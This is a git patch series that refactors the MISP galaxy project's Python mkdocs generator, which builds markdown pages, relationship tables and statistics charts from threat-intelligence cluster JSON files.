MISP galaxy can be utilized in their original form or as a foundational knowledge base. The distribution settings for each cluster can be adjusted, allowing for either restricted or wide dissemination.\n\nAdditionally, MISP galaxies enable the representation of existing standards like the MITRE ATT&CK™ framework, as well as custom matrices.\n\nThe aim is to provide a core set of clusters for organizations embarking on analysis, which can be further tailored to include localized, private information or additional, shareable data.\n\nClusters serve as an open and freely accessible knowledge base, which can be utilized and expanded within [MISP](https://www.misp-project.org/) or other threat intelligence platforms.\n\n![Overview of the integration of MISP galaxy in the MISP Threat Intelligence Sharing Platform](https://raw.githubusercontent.com/MISP/misp-galaxy/aa41337fd78946a60aef3783f58f337d2342430a/doc/images/galaxy.png)\n\n## Publicly available clusters\n" - for galaxy in galaxies: - galaxy_folder = galaxy.json_file_name.replace(".json", "") - index_output += f"- [{galaxy.galaxy_name}](./{galaxy_folder}/index.md)\n" - index_output += "## Statistics\n\nYou can find some statistics about MISP galaxies [here](./statistics.md).\n" - index_output += "# Contributing\n\nIn the dynamic realm of threat intelligence, a variety of models and approaches exist to systematically organize, categorize, and delineate threat actors, hazards, or activity groups. We embrace innovative methodologies for articulating threat intelligence. The galaxy model is particularly versatile, enabling you to leverage and integrate methodologies that you trust and are already utilizing within your organization or community.\n\nWe encourage collaboration and contributions to the [MISP Galaxy JSON files](https://github.com/MISP/misp-galaxy/). Feel free to fork the project, enhance existing elements or clusters, or introduce new ones. Your insights are valuable - share them with us through a pull-request.\n" - return index_output - -if __name__ == "__main__": - start_time = time.time() - universe = Universe() - - FILES_TO_IGNORE.extend(get_deprecated_galaxy_files()) - galaxies_fnames = [] - for f in os.listdir(CLUSTER_PATH): - if ".json" in f and f not in FILES_TO_IGNORE: - galaxies_fnames.append(f) - galaxies_fnames.sort() - - # Create the universe of clusters and galaxies - for galaxy in galaxies_fnames: - with open(os.path.join(CLUSTER_PATH, galaxy)) as fr: - galaxy_json = json.load(fr) - universe.add_galaxy(galaxy_name=galaxy_json["name"], json_file_name=galaxy, authors=galaxy_json["authors"], description=galaxy_json["description"]) - for cluster in galaxy_json["values"]: - universe.add_cluster( - galaxy_name=galaxy_json.get("name", None), - uuid=cluster.get("uuid", None), - description=cluster.get("description", None), - value=cluster.get("value", None), - meta=cluster.get("meta", None) - ) - - # Define the relationships between clusters - for galaxy in galaxies_fnames: - with open(os.path.join(CLUSTER_PATH, galaxy)) as fr: - galaxy_json = json.load(fr) - for cluster in galaxy_json["values"]: - if "related" in cluster: - for related in cluster["related"]: - universe.define_relationship(cluster["uuid"], related["dest-uuid"]) - - tasks = [] - for galaxy_name, galaxy in universe.galaxies.items(): - for cluster_name, cluster in galaxy.clusters.items(): - tasks.append((galaxy_name, cluster_name)) - - with Pool(processes=multiprocessing.cpu_count()) as pool: - result = pool.map(get_cluster_relationships, tasks) - - for cluster, galaxy, relationships in result: - universe.galaxies[galaxy].clusters[cluster].relationships = relationships - - print("All clusters processed.") - - print(f"Finished relations in {time.time() - start_time} seconds") - - # Write output - if not os.path.exists(SITE_PATH): - os.mkdir(SITE_PATH) - - with open(os.path.join(SITE_PATH, "index.md"), "w") as index: - index.write(generate_index_page(universe.galaxies.values())) - - for galaxy in universe.galaxies.values(): - galaxy.write_entry(SITE_PATH) - - for galaxy in universe.galaxies.values(): - galaxy_path = os.path.join(SITE_PATH, f"{galaxy.json_file_name}".replace(".json", "")) - if not os.path.exists(galaxy_path): - os.mkdir(galaxy_path) - relation_path = os.path.join(galaxy_path, "relations") - if not os.path.exists(relation_path): - os.mkdir(relation_path) - with open(os.path.join(relation_path, ".pages"), "w") as index: - index.write(f"hide: true\n") - - for cluster in galaxy.clusters.values(): - if cluster.relationships: - print(f"Writing {cluster.uuid}.md") - with open(os.path.join(relation_path, f"{cluster.uuid}.md"), "w") as index: - index.write(generate_relations_table(cluster.relationships)) - - print(f"Finished in {time.time() - start_time} seconds") diff --git a/tools/mkdocs/modules/site.py b/tools/mkdocs/modules/site.py new file mode 100644 index 0000000..2e651dc --- /dev/null +++ b/tools/mkdocs/modules/site.py @@ -0,0 +1,81 @@ +import os + +from utils.helper import create_bar_chart, get_top_x, create_pie_chart + +class Site: + def __init__(self, path, name) -> None: + self.path = path + self.name = name + self.content = "" + + def add_content(self, content): + self.content += content + + def write_entry(self): + with open(os.path.join(self.path, self.name), "w") as index: + index.write(self.content) + +class IndexSite(Site): + def __init__(self, path) -> None: + super().__init__(path=path, name="index.md") + + def add_toc(self, galaxies): + for galaxy in galaxies: + galaxy_folder = galaxy.json_file_name.replace(".json", "") + self.add_content(f"- [{galaxy.galaxy_name}](./{galaxy_folder}/index.md)\n") + self.add_content("\n") + +class StatisticsSite(Site): + def __init__(self, path) -> None: + super().__init__(path=path, name="statistics.md") + + def add_galaxy_statistics(self, galaxies): + galaxy_cluster_count = {galaxy.galaxy_name: len(galaxy.clusters) for galaxy in galaxies} + top_20 = get_top_x(galaxy_cluster_count, 20) + flop_20 = get_top_x(galaxy_cluster_count, 20, False) + self.add_content(f"# Galaxy statistics\n") + self.add_content(f"## Galaxies with the most clusters\n") + self.add_content(create_bar_chart(x_axis="Galaxy", y_axis="Count", values=top_20)) + self.add_content(f"## Galaxies with the least clusters\n") + self.add_content(create_bar_chart(x_axis="Galaxy", y_axis="Count", values=flop_20)) + + def add_cluster_statistics(self, clusters): + public_clusters = 0 + private_clusters = 0 + for cluster in clusters: + if cluster.value == "Private Cluster": + private_clusters += 1 + else: + public_clusters += 1 + values = {"Public clusters": public_clusters, "Private clusters": private_clusters} + self.add_content(f"# Cluster statistics\n") + self.add_content(f"## Number of clusters\n") + self.add_content(f"Here you can find the total number of clusters including public and private clusters.The number of public clusters has been calculated based on the number of unique Clusters in the MISP galaxy JSON files. The number of private clusters could only be approximated based on the number of relations to non-existing clusters. Therefore the number of private clusters is not accurate and only an approximation.\n\n") + self.add_content(create_pie_chart(sector="Type", unit="Count", values=values)) + + def add_relation_statistics(self, clusters): + cluster_relations = {} + private_relations = 0 + public_relations = 0 + for cluster in clusters: + cluster_relations[cluster.uuid] = len(cluster.relations) + for relation in cluster.relations: + if relation.to_cluster.value == "Private Cluster": + private_relations += 1 + else: + public_relations += 1 + top_20 = get_top_x(cluster_relations, 20) + flop_20 = get_top_x(cluster_relations, 20, False) + self.add_content(f"# Relation statistics\n") + self.add_content(f"Here you can find the total number of relations including public and private relations. The number includes relations between public clusters and relations between public and private clusters. Therefore relatons between private clusters are not included in the statistics.\n\n") + self.add_content(f"## Number of relations\n") + self.add_content(create_pie_chart(sector="Type", unit="Count", values={"Public relations": public_relations, "Private relations": private_relations})) + self.add_content(f"**Average number of relations per cluster**: {int(sum(cluster_relations.values()) / len(cluster_relations))}\n") + self.add_content(f"## Cluster with the most relations\n") + self.add_content(create_bar_chart(x_axis="Cluster", y_axis="Count", values=top_20)) + self.add_content(f"## Cluster with the least relations\n") + self.add_content(create_bar_chart(x_axis="Cluster", y_axis="Count", values=flop_20)) + + def add_synonym_statistics(self, clusters): + pass + diff --git a/tools/mkdocs/modules/universe.py b/tools/mkdocs/modules/universe.py index 6e1607a..d2e701f 100644 --- a/tools/mkdocs/modules/universe.py +++ b/tools/mkdocs/modules/universe.py @@ -21,13 +21,16 @@ class Universe: cluster_a = None cluster_b = None + if cluster_a_id == cluster_b_id: + return + # Search for Cluster A and Cluster B in all galaxies for galaxy in self.galaxies.values(): if cluster_a_id in galaxy.clusters: cluster_a = galaxy.clusters[cluster_a_id] if cluster_b_id in galaxy.clusters: cluster_b = galaxy.clusters[cluster_b_id] - if cluster_a and cluster_b: # Both clusters found + if cluster_a and cluster_b: break # If both clusters are found, define the relationship @@ -35,7 +38,6 @@ class Universe: cluster_a.add_outbound_relationship(cluster_b) cluster_b.add_inbound_relationship(cluster_a) else: - # If Cluster B is not found, create a private cluster relationship for Cluster A if cluster_a: private_cluster = Cluster(uuid=cluster_b_id, galaxy=None, description=None, value="Private Cluster", meta=None) cluster_a.add_outbound_relationship(private_cluster) @@ -67,26 +69,18 @@ class Universe: if neighbor not in visited and neighbor.value != "Private Cluster": queue.append((neighbor, level + 1)) - # count = 0 # Convert the defaultdict to a list of tuples, ignoring direction processed_relationships = [] for link, lvl in relationships.items(): # Extract clusters from the frozenset; direction is irrelevant clusters = list(link) - if len(clusters) != 2: - # count += 1 - continue # Arbitrarily choose the first cluster as 'source' for consistency if clusters[0].value == "Private Cluster": processed_relationships.append((clusters[1], clusters[0], lvl)) else: - processed_relationships.append((clusters[0], clusters[1], lvl)) - # except: - # processed_relationships.append((clusters[0], clusters[0], lvl)) # This is wrong just for testing!!! - # print(f"Count: {count}") return processed_relationships return bfs_with_undirected_relationships(start_cluster) \ No newline at end of file diff --git a/tools/mkdocs/utils/helper.py b/tools/mkdocs/utils/helper.py index 5be772d..38a734b 100644 --- a/tools/mkdocs/utils/helper.py +++ b/tools/mkdocs/utils/helper.py @@ -18,4 +18,22 @@ def name_to_section(name): .replace("/", "") .replace(":", "") .replace(placeholder, "-") - ) # Replace the placeholder with "-" \ No newline at end of file + ) # Replace the placeholder with "-" + + +def create_bar_chart(x_axis, y_axis, values, log=False): + if not log: + chart = f"| No. | {x_axis} | {y_axis} {{ .bar-chart }}|\n" + else: + chart = f"| No. | {x_axis} | {y_axis} {{ .log-bar-chart }}|\n" + chart += f"|----|--------|-------|\n" + for i, x, y in enumerate(values): + chart += f"| {i+1} | {x} | {y} |\n" + return chart + +def create_pie_chart(sector, unit, values): + chart = f"| No. | {sector} | {unit} {{ .pie-chart }}|\n" + chart += f"|----|--------|-------|\n" + for i, x, y in enumerate(values): + chart += f"| {i+1} | {x} | {y} |\n" + return chart From 9514ce7fcdb359cd1b6452222e76248b677a0e86 Mon Sep 17 00:00:00 2001 From: niclas Date: Tue, 5 Mar 2024 10:23:19 +0100 Subject: [PATCH 31/49] Add [tool] multithreading --- tools/mkdocs/generator.py | 50 +++----- tools/mkdocs/modules/site.py | 43 +++---- tools/mkdocs/modules/statistics.py | 118 ------------------ tools/mkdocs/modules/universe.py | 3 + .../docs/01_attachements/javascripts/graph.js | 4 +- tools/mkdocs/utils/helper.py | 53 ++++++-- 6 files changed, 86 insertions(+), 185 deletions(-) delete mode 100644 tools/mkdocs/modules/statistics.py diff --git a/tools/mkdocs/generator.py b/tools/mkdocs/generator.py index 0b3342c..f765353 100644 --- a/tools/mkdocs/generator.py +++ b/tools/mkdocs/generator.py @@ -1,9 +1,12 @@ from modules.universe import Universe from modules.site import IndexSite, StatisticsSite +from utils.helper import generate_relations_table import multiprocessing from multiprocessing import Pool +from concurrent.futures import ThreadPoolExecutor + import json import os import time @@ -16,6 +19,12 @@ CLUSTER_PATH = "../../clusters" SITE_PATH = "./site/docs" GALAXY_PATH = "../../galaxies" +def write_relations_table(cluster): + if cluster.relationships: + print(f"Writing {cluster.uuid}.md") + with open(os.path.join(relation_path, f"{cluster.uuid}.md"), "w") as index: + index.write(generate_relations_table(cluster.relationships)) + def get_cluster_relationships(cluster_data): galaxy, cluster = cluster_data relationships = universe.get_relationships_with_levels(universe.galaxies[galaxy].clusters[cluster]) @@ -32,36 +41,6 @@ def get_deprecated_galaxy_files(): return deprecated_galaxy_files -def cluster_transform_to_link(cluster): - placeholder = "__TMP__" - section = ( - cluster - .value.lower() - .replace(" - ", placeholder) # Replace " - " first - .replace(" ", "-") - .replace("/", "") - .replace(":", "") - .replace(placeholder, "-") - ) - galaxy_folder = cluster.galaxy.json_file_name.replace(".json", "") - return f"[{cluster.value} ({cluster.uuid})](../../{galaxy_folder}/index.md#{section})" - -def galaxy_transform_to_link(galaxy): - galaxy_folder = galaxy.json_file_name.replace(".json", "") - return f"[{galaxy.galaxy_name}](../../{galaxy_folder}/index.md)" - -def generate_relations_table(relationships): - markdown = "|Cluster A | Galaxy A | Cluster B | Galaxy B | Level { .graph } |\n" - markdown += "| --- | --- | --- | --- | --- |\n" - for from_cluster, to_cluster, level in relationships: - from_galaxy = from_cluster.galaxy - if to_cluster.value != "Private Cluster": - to_galaxy = to_cluster.galaxy - markdown += f"{cluster_transform_to_link(from_cluster)} | {galaxy_transform_to_link(from_galaxy)} | {cluster_transform_to_link(to_cluster)} | {galaxy_transform_to_link(to_galaxy)} | {level}\n" - else: - markdown += f"{cluster_transform_to_link(from_cluster)} | {galaxy_transform_to_link(from_galaxy)} | {to_cluster.value} | Unknown | {level}\n" - return markdown - if __name__ == "__main__": start_time = time.time() universe = Universe() @@ -123,9 +102,10 @@ if __name__ == "__main__": index.write_entry() statistics = StatisticsSite(SITE_PATH) + statistics.add_cluster_statistics(len([cluster for galaxy in universe.galaxies.values() for cluster in galaxy.clusters.values()]), len(universe.private_clusters)) statistics.add_galaxy_statistics(universe.galaxies.values()) - statistics.add_cluster_statistics([cluster for galaxy in universe.galaxies.values() for cluster in galaxy.clusters.values()]) statistics.add_relation_statistics([cluster for galaxy in universe.galaxies.values() for cluster in galaxy.clusters.values()]) + statistics.add_synonym_statistics([cluster for galaxy in universe.galaxies.values() for cluster in galaxy.clusters.values()]) statistics.write_entry() for galaxy in universe.galaxies.values(): @@ -141,10 +121,8 @@ if __name__ == "__main__": with open(os.path.join(relation_path, ".pages"), "w") as index: index.write(f"hide: true\n") - for cluster in galaxy.clusters.values(): - if cluster.relationships: - print(f"Writing {cluster.uuid}.md") - with open(os.path.join(relation_path, f"{cluster.uuid}.md"), "w") as index: - index.write(generate_relations_table(cluster.relationships)) + with ThreadPoolExecutor(max_workers=(multiprocessing.cpu_count() * 4)) as executor: + executor.map(write_relations_table, galaxy.clusters.values()) + print(f"Finished in {time.time() - start_time} seconds") diff --git a/tools/mkdocs/modules/site.py b/tools/mkdocs/modules/site.py index 2e651dc..2938874 100644 --- a/tools/mkdocs/modules/site.py +++ b/tools/mkdocs/modules/site.py @@ -12,6 +12,8 @@ class Site: self.content += content def write_entry(self): + if not os.path.exists(self.path): + os.makedirs(self.path) with open(os.path.join(self.path, self.name), "w") as index: index.write(self.content) @@ -30,23 +32,16 @@ class StatisticsSite(Site): super().__init__(path=path, name="statistics.md") def add_galaxy_statistics(self, galaxies): - galaxy_cluster_count = {galaxy.galaxy_name: len(galaxy.clusters) for galaxy in galaxies} + galaxy_cluster_count = {galaxy: len(galaxy.clusters) for galaxy in galaxies} top_20 = get_top_x(galaxy_cluster_count, 20) flop_20 = get_top_x(galaxy_cluster_count, 20, False) self.add_content(f"# Galaxy statistics\n") - self.add_content(f"## Galaxies with the most clusters\n") - self.add_content(create_bar_chart(x_axis="Galaxy", y_axis="Count", values=top_20)) - self.add_content(f"## Galaxies with the least clusters\n") - self.add_content(create_bar_chart(x_axis="Galaxy", y_axis="Count", values=flop_20)) + self.add_content(f"## Galaxies with the most clusters\n\n") + self.add_content(create_bar_chart(x_axis="Galaxy", y_axis="Count", values=top_20, galaxy=True)) + self.add_content(f"## Galaxies with the least clusters\n\n") + self.add_content(create_bar_chart(x_axis="Galaxy", y_axis="Count", values=flop_20, galaxy=True)) - def add_cluster_statistics(self, clusters): - public_clusters = 0 - private_clusters = 0 - for cluster in clusters: - if cluster.value == "Private Cluster": - private_clusters += 1 - else: - public_clusters += 1 + def add_cluster_statistics(self, public_clusters, private_clusters): values = {"Public clusters": public_clusters, "Private clusters": private_clusters} self.add_content(f"# Cluster statistics\n") self.add_content(f"## Number of clusters\n") @@ -58,9 +53,9 @@ class StatisticsSite(Site): private_relations = 0 public_relations = 0 for cluster in clusters: - cluster_relations[cluster.uuid] = len(cluster.relations) - for relation in cluster.relations: - if relation.to_cluster.value == "Private Cluster": + cluster_relations[cluster] = len(cluster.relationships) + for relation in cluster.relationships: + if relation[1].value == "Private Cluster": private_relations += 1 else: public_relations += 1 @@ -68,14 +63,20 @@ class StatisticsSite(Site): flop_20 = get_top_x(cluster_relations, 20, False) self.add_content(f"# Relation statistics\n") self.add_content(f"Here you can find the total number of relations including public and private relations. The number includes relations between public clusters and relations between public and private clusters. Therefore relatons between private clusters are not included in the statistics.\n\n") - self.add_content(f"## Number of relations\n") + self.add_content(f"## Number of relations\n\n") self.add_content(create_pie_chart(sector="Type", unit="Count", values={"Public relations": public_relations, "Private relations": private_relations})) self.add_content(f"**Average number of relations per cluster**: {int(sum(cluster_relations.values()) / len(cluster_relations))}\n") - self.add_content(f"## Cluster with the most relations\n") + self.add_content(f"## Cluster with the most relations\n\n") self.add_content(create_bar_chart(x_axis="Cluster", y_axis="Count", values=top_20)) - self.add_content(f"## Cluster with the least relations\n") + self.add_content(f"## Cluster with the least relations\n\n") self.add_content(create_bar_chart(x_axis="Cluster", y_axis="Count", values=flop_20)) def add_synonym_statistics(self, clusters): - pass - + synonyms = {} + for cluster in clusters: + if cluster.meta and cluster.meta.get("synonyms"): + synonyms[cluster] = len(cluster.meta["synonyms"]) + top_20 = get_top_x(synonyms, 20) + self.add_content(f"# Synonym statistics\n") + self.add_content(f"## Cluster with the most synonyms\n\n") + self.add_content(create_bar_chart(x_axis="Cluster", y_axis="Count", values=top_20)) diff --git a/tools/mkdocs/modules/statistics.py b/tools/mkdocs/modules/statistics.py deleted file mode 100644 index a1c986a..0000000 --- a/tools/mkdocs/modules/statistics.py +++ /dev/null @@ -1,118 +0,0 @@ -from utils.helper import get_top_x, name_to_section -import os - - -class Statistics: - def __init__(self, cluster_dict): - self.public_relations_count = 0 - self.private_relations_count = 0 - self.private_clusters = [] - self.public_clusters_dict = {} - self.relation_count_dict = {} - self.synonyms_count_dict = {} - self.empty_uuids_dict = {} - self.cluster_dict = cluster_dict - self.entry = "" - - def create_entry(self): - self.entry += f"# MISP Galaxy statistics\n" - self.entry += "The MISP galaxy statistics are automatically generated based on the MISP galaxy JSON files. Therefore the statistics only include detailed infomration about public clusters and relations. Some statistics about private clusters and relations is included but only as an approximation based on the information gathered from the public clusters.\n" - self.entry += "\n" - self._create_cluster_statistics() - self._create_galaxy_statistics() - self._create_relation_statistics() - self._create_synonym_statistics() - - def _create_galaxy_statistics(self): - self.entry += f"# Galaxy statistics\n" - self.entry += f"## Galaxies with the most clusters\n" - galaxy_counts = {} - for galaxy in self.public_clusters_dict.values(): - galaxy_counts[galaxy] = galaxy_counts.get(galaxy, 0) + 1 - top_galaxies, top_galaxies_values = get_top_x(galaxy_counts, 20) - self.entry += f" | No. | Galaxy | Count {{ .log-bar-chart }}|\n" - self.entry += f" |----|--------|-------|\n" - for i, galaxy in enumerate(top_galaxies, 1): - galaxy_section = name_to_section(galaxy.json_file_name) - self.entry += f" | {i} | [{galaxy.name}](../{galaxy_section}) | {top_galaxies_values[i-1]} |\n" - self.entry += f"\n" - - self.entry += f"## Galaxies with the least clusters\n" - flop_galaxies, flop_galaxies_values = get_top_x(galaxy_counts, 20, False) - self.entry += f" | No. | Galaxy | Count {{ .bar-chart }}|\n" - self.entry += f" |----|--------|-------|\n" - for i, galaxy in enumerate(flop_galaxies, 1): - galaxy_section = name_to_section(galaxy.json_file_name) - self.entry += f" | {i} | [{galaxy.name}](../{galaxy_section}) | {flop_galaxies_values[i-1]} |\n" - self.entry += f"\n" - - def _create_cluster_statistics(self): - self.entry += f"# Cluster statistics\n" - self.entry += f"## Number of clusters\n" - self.entry += f"Here you can find the total number of clusters including public and private clusters. The number of public clusters has been calculated based on the number of unique Clusters in the MISP galaxy JSON files. The number of private clusters could only be approximated based on the number of relations to non-existing clusters. Therefore the number of private clusters is not accurate and only an approximation.\n" - self.entry += f"\n" - self.entry += f"| No. | Type | Count {{ .pie-chart }}|\n" - self.entry += f"|-----|------|-----------------------|\n" - self.entry += f"| 1 | Public clusters | {len(self.public_clusters_dict)} |\n" - self.entry += f"| 2 | Private clusters | {len(self.private_clusters)} |\n" - self.entry += f"\n" - - def _create_relation_statistics(self): - self.entry += f"# Relation statistics\n" - self.entry += f"Here you can find the total number of relations including public and private relations. The number includes relations between public clusters and relations between public and private clusters. Therefore relatons between private clusters are not included in the statistics.\n" - self.entry += f"\n" - self.entry += f"## Number of relations\n" - self.entry += f"| No. | Type | Count {{ .pie-chart }}|\n" - self.entry += f"|----|------|-------|\n" - self.entry += f"| 1 | Public relations | {self.public_relations_count} |\n" - self.entry += f"| 2 | Private relations | {self.private_relations_count} |\n" - self.entry += f"\n" - - self.entry += f"**Average number of relations per cluster**: {int(sum(self.relation_count_dict.values()) / len(self.relation_count_dict))}\n" - - self.entry += f"## Cluster with the most relations\n" - relation_count_dict_names = { - self.cluster_dict[uuid].value: count - for uuid, count in self.relation_count_dict.items() - } - top_25_relation, top_25_relation_values = get_top_x( - relation_count_dict_names, 20 - ) - self.entry += f" | No. | Cluster | Count {{ .bar-chart }}|\n" - self.entry += f" |----|--------|-------|\n" - relation_count_dict_galaxies = { - self.cluster_dict[uuid].value: self.cluster_dict[uuid].galaxy.json_file_name - for uuid in self.relation_count_dict.keys() - } - for i, cluster in enumerate(top_25_relation, 1): - cluster_section = name_to_section(cluster) - self.entry += f" | {i} | [{cluster}](../{relation_count_dict_galaxies[cluster]}/#{cluster_section}) | {top_25_relation_values[i-1]} |\n" - self.entry += f"\n" - - def _create_synonym_statistics(self): - self.entry += f"# Synonym statistics\n" - self.entry += f"## Cluster with the most synonyms\n" - synonyms_count_dict_names = { - self.cluster_dict[uuid].value: count - for uuid, count in self.synonyms_count_dict.items() - } - top_synonyms, top_synonyms_values = get_top_x(synonyms_count_dict_names, 20) - self.entry += f" | No. | Cluster | Count {{ .bar-chart }}|\n" - self.entry += f" |----|--------|-------|\n" - synonyms_count_dict_galaxies = { - self.cluster_dict[uuid].value: self.cluster_dict[uuid].galaxy.json_file_name - for uuid in self.synonyms_count_dict.keys() - } - for i, cluster in enumerate(top_synonyms, 1): - cluster_section = name_to_section(cluster) - self.entry += f" | {i} | [{cluster}](../{synonyms_count_dict_galaxies[cluster]}/#{cluster_section}) | {top_synonyms_values[i-1]} |\n" - self.entry += f"\n" - - def write_entry(self, path): - self.create_entry() - with open(os.path.join(path, "statistics.md"), "w") as index: - index.write(self.entry) - - def add_cluster(self, cluster): - self.public_clusters_dict[cluster.uuid] = cluster.galaxy - cluster.statistics = self diff --git a/tools/mkdocs/modules/universe.py b/tools/mkdocs/modules/universe.py index d2e701f..a22f48c 100644 --- a/tools/mkdocs/modules/universe.py +++ b/tools/mkdocs/modules/universe.py @@ -8,6 +8,7 @@ class Universe: def __init__(self, add_inbound_relationship=False): self.galaxies = {} # Maps galaxy_name to Galaxy objects self.add_inbound_relationship = add_inbound_relationship + self.private_clusters = {} def add_galaxy(self, galaxy_name, json_file_name, authors, description): if galaxy_name not in self.galaxies: @@ -39,7 +40,9 @@ class Universe: cluster_b.add_inbound_relationship(cluster_a) else: if cluster_a: + # private_cluster = self.add_cluster(uuid=cluster_b_id, galaxy_name="Unknown", description=None, value="Private Cluster", meta=None) private_cluster = Cluster(uuid=cluster_b_id, galaxy=None, description=None, value="Private Cluster", meta=None) + self.private_clusters[cluster_b_id] = private_cluster cluster_a.add_outbound_relationship(private_cluster) else: raise ValueError(f"Cluster {cluster_a} not found in any galaxy") diff --git a/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js b/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js index ced8070..db5f3ff 100644 --- a/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js +++ b/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js @@ -82,7 +82,9 @@ document$.subscribe(function () { path: nodePaths[id] })); - const Parent_Node = nodes[0]; + let header = document.querySelector('h1').textContent; + const parentUUID = header.replace(/\s+/g, '-').charAt(0).toLowerCase() + header.replace(/\s+/g, '-').slice(1); + const Parent_Node = nodes.find(node => node.id.includes(parentUUID)); var links = data.map(d => ({ source: d.source, target: d.target })); diff --git a/tools/mkdocs/utils/helper.py b/tools/mkdocs/utils/helper.py index 38a734b..c043fe7 100644 --- a/tools/mkdocs/utils/helper.py +++ b/tools/mkdocs/utils/helper.py @@ -4,10 +4,8 @@ def get_top_x(dict, x, big_to_small=True): sorted_dict = sorted( dict.items(), key=operator.itemgetter(1), reverse=big_to_small )[:x] - top_x = [key for key, value in sorted_dict] - top_x_values = sorted(dict.values(), reverse=big_to_small)[:x] - return top_x, top_x_values - + top_x = {key: value for key, value in sorted_dict} + return top_x def name_to_section(name): placeholder = "__TMP__" @@ -20,20 +18,57 @@ def name_to_section(name): .replace(placeholder, "-") ) # Replace the placeholder with "-" - -def create_bar_chart(x_axis, y_axis, values, log=False): +def create_bar_chart(x_axis, y_axis, values, log=False, galaxy=False): if not log: chart = f"| No. | {x_axis} | {y_axis} {{ .bar-chart }}|\n" else: chart = f"| No. | {x_axis} | {y_axis} {{ .log-bar-chart }}|\n" chart += f"|----|--------|-------|\n" - for i, x, y in enumerate(values): - chart += f"| {i+1} | {x} | {y} |\n" + for i, (x, y) in enumerate(values.items()): + if galaxy: + chart += f"| {i+1} | {galaxy_transform_to_link(x)} | {y} |\n" + else: + chart += f"| {i+1} | {cluster_transform_to_link(x)} | {y} |\n" + chart += "\n" return chart def create_pie_chart(sector, unit, values): chart = f"| No. | {sector} | {unit} {{ .pie-chart }}|\n" chart += f"|----|--------|-------|\n" - for i, x, y in enumerate(values): + for i, (x, y) in enumerate(values.items()): chart += f"| {i+1} | {x} | {y} |\n" + chart += "\n" return chart + +def cluster_transform_to_link(cluster, uuid=False): + placeholder = "__TMP__" + section = ( + cluster + .value.lower() + .replace(" - ", placeholder) # Replace " - " first + .replace(" ", "-") + .replace("/", "") + .replace(":", "") + .replace(placeholder, "-") + ) + galaxy_folder = cluster.galaxy.json_file_name.replace(".json", "") + if uuid: + return f"[{cluster.value} ({cluster.uuid})](../../{galaxy_folder}/index.md#{section})" + else: + return f"[{cluster.value}](../../{galaxy_folder}/index.md#{section})" + +def galaxy_transform_to_link(galaxy): + galaxy_folder = galaxy.json_file_name.replace(".json", "") + return f"[{galaxy.galaxy_name}](../../{galaxy_folder}/index.md)" + +def generate_relations_table(relationships): + markdown = "|Cluster A | Galaxy A | Cluster B | Galaxy B | Level { .graph } |\n" + markdown += "| --- | --- | --- | --- | --- |\n" + for from_cluster, to_cluster, level in relationships: + from_galaxy = from_cluster.galaxy + if to_cluster.value != "Private Cluster": + to_galaxy = to_cluster.galaxy + markdown += f"{cluster_transform_to_link(from_cluster, uuid=True)} | {galaxy_transform_to_link(from_galaxy)} | {cluster_transform_to_link(to_cluster, uuid=True)} | {galaxy_transform_to_link(to_galaxy)} | {level}\n" + else: + markdown += f"{cluster_transform_to_link(from_cluster, uuid=True)} | {galaxy_transform_to_link(from_galaxy)} | {to_cluster.value} | Unknown | {level}\n" + return markdown \ No newline at end of file From ab5a95ffc63a27639892c6d42ee7fbed631d88b7 Mon Sep 17 00:00:00 2001 From: niclas Date: Tue, 5 Mar 2024 11:01:51 +0100 Subject: [PATCH 32/49] chg [tool] code formatting --- tools/mkdocs/generator.py | 86 ++++++++++++++++++++++++-------- tools/mkdocs/modules/cluster.py | 11 ++-- tools/mkdocs/modules/galaxy.py | 17 +++++-- tools/mkdocs/modules/site.py | 55 ++++++++++++++++---- tools/mkdocs/modules/universe.py | 40 +++++++++++---- tools/mkdocs/utils/helper.py | 12 +++-- 6 files changed, 168 insertions(+), 53 deletions(-) diff --git a/tools/mkdocs/generator.py b/tools/mkdocs/generator.py index f765353..34bd3cd 100644 --- a/tools/mkdocs/generator.py +++ b/tools/mkdocs/generator.py @@ -12,25 +12,30 @@ import os import time import sys -sys.setrecursionlimit(10000) +sys.setrecursionlimit(10000) -FILES_TO_IGNORE = [] +FILES_TO_IGNORE = [] CLUSTER_PATH = "../../clusters" SITE_PATH = "./site/docs" GALAXY_PATH = "../../galaxies" + def write_relations_table(cluster): if cluster.relationships: print(f"Writing {cluster.uuid}.md") with open(os.path.join(relation_path, f"{cluster.uuid}.md"), "w") as index: index.write(generate_relations_table(cluster.relationships)) + def get_cluster_relationships(cluster_data): galaxy, cluster = cluster_data - relationships = universe.get_relationships_with_levels(universe.galaxies[galaxy].clusters[cluster]) + relationships = universe.get_relationships_with_levels( + universe.galaxies[galaxy].clusters[cluster] + ) print(f"Processed {galaxy}, {cluster}") return cluster, galaxy, relationships + def get_deprecated_galaxy_files(): deprecated_galaxy_files = [] for f in os.listdir(GALAXY_PATH): @@ -41,6 +46,7 @@ def get_deprecated_galaxy_files(): return deprecated_galaxy_files + if __name__ == "__main__": start_time = time.time() universe = Universe() @@ -56,15 +62,20 @@ if __name__ == "__main__": for galaxy in galaxies_fnames: with open(os.path.join(CLUSTER_PATH, galaxy)) as fr: galaxy_json = json.load(fr) - universe.add_galaxy(galaxy_name=galaxy_json["name"], json_file_name=galaxy, authors=galaxy_json["authors"], description=galaxy_json["description"]) + universe.add_galaxy( + galaxy_name=galaxy_json["name"], + json_file_name=galaxy, + authors=galaxy_json["authors"], + description=galaxy_json["description"], + ) for cluster in galaxy_json["values"]: universe.add_cluster( - galaxy_name=galaxy_json.get("name", None), - uuid=cluster.get("uuid", None), - description=cluster.get("description", None), - value=cluster.get("value", None), - meta=cluster.get("meta", None) - ) + galaxy_name=galaxy_json.get("name", None), + uuid=cluster.get("uuid", None), + description=cluster.get("description", None), + value=cluster.get("value", None), + meta=cluster.get("meta", None), + ) # Define the relationships between clusters for galaxy in galaxies_fnames: @@ -73,7 +84,9 @@ if __name__ == "__main__": for cluster in galaxy_json["values"]: if "related" in cluster: for related in cluster["related"]: - universe.define_relationship(cluster["uuid"], related["dest-uuid"]) + universe.define_relationship( + cluster["uuid"], related["dest-uuid"] + ) tasks = [] for galaxy_name, galaxy in universe.galaxies.items(): @@ -93,26 +106,56 @@ if __name__ == "__main__": # Write output if not os.path.exists(SITE_PATH): os.mkdir(SITE_PATH) - + index = IndexSite(SITE_PATH) - index.add_content("# MISP Galaxy\n\nThe MISP galaxy offers a streamlined approach for representing large entities, known as clusters, which can be linked to MISP events or attributes. Each cluster consists 